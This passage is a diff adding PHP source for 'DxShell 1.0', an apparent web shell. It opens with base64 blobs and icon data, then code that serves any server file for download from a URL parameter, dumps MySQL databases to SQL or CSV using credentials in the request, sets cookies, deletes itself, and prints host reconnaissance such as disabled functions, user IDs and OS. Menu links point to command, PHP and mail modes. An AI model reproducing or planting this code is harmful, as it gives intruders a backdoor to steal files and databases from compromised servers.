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',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	header('Expires: '.Date('r', time()+60*60*24*300));
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{	foreach ($_POST['dxparam'] as $name => $val)
+		{		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<http://leet.phpnet.us/sh.gif>
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
